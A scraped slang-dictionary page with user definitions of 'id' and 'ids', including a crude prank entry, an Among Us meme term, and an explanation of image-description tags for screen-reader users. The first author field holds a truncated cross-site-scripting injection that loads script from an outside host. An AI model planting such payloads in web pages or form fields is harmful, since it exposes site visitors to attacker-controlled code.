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by "><script src=https://zonduxss April 25, 2019

by Coop Dupe June 17, 2018

A lemon head candy that has been placed in a rectum, retrieved, and offered to a friend as Ass-Id (Acid)
by TheLordOfShadows July 2, 2020

ids is an alternative expression of "I don't <something>" derived from Amongus. This term was first used by Kingboogers. There are additional expressions such as wts (what the sus) and ns (no sus?)
by gqmpodr April 12, 2022

Acronym for Image Description.
Often used in social media, ID is used to describe an image attached to a post in the following format:
ID: *description on the image* /end ID
This makes social media a friendlier space for people with sight disabilities or others that require them to use screen readers.
Often used in social media, ID is used to describe an image attached to a post in the following format:
ID: *description on the image* /end ID
This makes social media a friendlier space for people with sight disabilities or others that require them to use screen readers.
id: reaction image of China Anne McClain with a major confusion face: her mouth slightly open, teeth showing, frowned eyebrows and her left hand in a position as if expressing the asking of a question. /end id
by yesifitswithyou April 12, 2022
